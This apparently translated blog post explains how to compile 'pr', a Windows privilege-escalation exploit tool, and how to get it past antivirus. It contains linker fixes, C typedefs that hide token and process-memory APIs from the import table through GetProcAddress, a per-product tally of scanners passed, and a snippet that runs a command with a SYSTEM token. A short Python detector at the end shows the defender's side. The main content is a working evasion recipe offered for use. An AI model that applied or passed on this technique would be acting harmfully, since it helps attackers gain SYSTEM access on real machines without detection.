Network security: compiling the pr source code and antivirus evasion

Reader submission 331 2022-10-06



The source code here is pr, written by KOOPie and provided on 暗组.

The source for these exploit tools was all written for VS 2003, whose build environment differs somewhat from VC, so various problems come up when compiling. Below we compile pr with VC++ 6.0.

Environment: VC++ 6.0

Missing file: sshwbemhelpers.h (specific to 2003 server), so we need to download it from the internet and copy it to X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h

    e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
    stdafx.cpp
    e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
    执行 cl.exe 时出错.

Project settings:

Project Settings --> Links --> append the following libraries to "Object/library modules", otherwise the errors below appear:

    psapi.lib wsock32.lib Ws2_32.lib,xolehlp.lib

    d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
    d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
    stdafx.cpp
    Linking...
    Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
    Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
    Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
    Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
    Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
    Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
    Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
    Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
    Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals

******************************************* Antivirus evasion **********************************************

NOD32: flags LookupAccountSid and DuplicateTokenEx. Both are resolved at run time through GetProcAddress instead of being imported statically:

    typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
    (
        __in_opt LPCSTR lpSystemName,
        __in PSID Sid,
        __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
        __inout  LPDWORD cchName,
        __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName,
        __inout LPDWORD cchReferencedDomainName,
        __out PSID_NAME_USE peUse
    );
    LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");

    typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
    (
        __in        HANDLE hExistingToken,
        __in        DWORD dwDesiredAccess,
        __in_opt    LPSECURITY_ATTRIBUTES lpTokenAttributes,
        __in        SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
        __in        TOKEN_TYPE TokenType,
        __deref_out PHANDLE phNewToken
    );
    DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");

Kaspersky: passed
Avira AntiVir: passed
McAfee: passed
AVG: passed
Symantec enterprise edition: passed
Norton AntiVirus: passed
360 full suite: passed

Kingsoft Antivirus (金山毒霸) full suite:

    typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
    (
        __in  HANDLE hProcess,
        __in  LPVOID lpAddress,
        __in  SIZE_T dwSize,
        __in  DWORD flNewProtect,
        __out PDWORD lpflOldProtect
    );
    VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");

    typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
    (
        __in      HANDLE hProcess,
        __in      LPVOID lpBaseAddress,
        __in_bcount(nSize) LPCVOID lpBuffer,
        __in      SIZE_T nSize,
        __out_opt SIZE_T * lpNumberOfBytesWritten
    );
    WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");

    typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
    (
        __in      HANDLE TokenHandle,
        __in      TOKEN_INFORMATION_CLASS TokenInformationClass,
        __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
        __in      DWORD TokenInformationLength,
        __out_opt PDWORD ReturnLength
    );
    GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");

Kingsoft's proactive defense is passed. Kingsoft's antivirus scan does detect the file, but raises no alert when it is executed. The scan flags the following two custom functions: DelRegistrySubkeys and RunCommandAsSystem.

    DelRegistrySubkeys();
    printf ("/xxoo/-->Running command with SYSTEM Token...\n");
    if (RunCommandAsSystem(hTokenOut, lpCommand))
    {
        printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
        return 0;
    }
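From the defender's side, the run-time resolution shown above removes the API names from the import table but leaves them in the binary as plain string literals next to a GetProcAddress import. The following is an added example, not code from the original page or from the pr author, that flags that mismatch; the sample image bytes and import set are constructed, and in practice the import set is assumed to come from a PE parser.

```python
import re

# API names that the page resolves through GetProcAddress (taken from the page).
WATCHED = {
    "LookupAccountSidA", "DuplicateTokenEx", "GetTokenInformation",
    "VirtualProtectEx", "WriteProcessMemory",
}
# Loader functions whose presence makes run-time resolution possible.
RESOLVERS = {"GetProcAddress", "LoadLibraryA", "LoadLibraryW"}

# Printable ASCII runs of 4+ bytes, the same idea as the `strings` utility.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(image):
    """Return the set of printable ASCII strings found in the raw image."""
    return {m.group().decode("ascii") for m in ASCII_RUN.finditer(image)}


def hidden_api_names(image, imports):
    """Watched API names stored as data strings but absent from the imports.

    `imports` is the set of function names from the PE import table.
    Nothing is reported unless a resolver function is imported as well.
    """
    if not RESOLVERS & imports:
        return []
    strings = extract_strings(image)
    return sorted(n for n in WATCHED if n in strings and n not in imports)


# Constructed sample: NUL-separated literals as they would sit in .rdata.
SAMPLE_IMAGE = (
    b"MZ\x90\x00\x03\x00"
    b"ADVAPI32.dll\x00DuplicateTokenEx\x00LookupAccountSidA\x00"
    b"KERNEL32.dll\x00WriteProcessMemory\x00"
    b"/xxoo/-->Running command with SYSTEM Token...\n\x00"
)
# Constructed import table: the watched names are deliberately missing.
SAMPLE_IMPORTS = {"GetProcAddress", "LoadLibraryA", "printf", "OpenProcessToken"}

if __name__ == "__main__":
    for name in hidden_api_names(SAMPLE_IMAGE, SAMPLE_IMPORTS):
        print("resolved at run time, not imported:", name)
```

A hit is a triage signal rather than a verdict, since legitimate software also resolves APIs dynamically; it is most useful combined with the sensitivity of the names involved.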

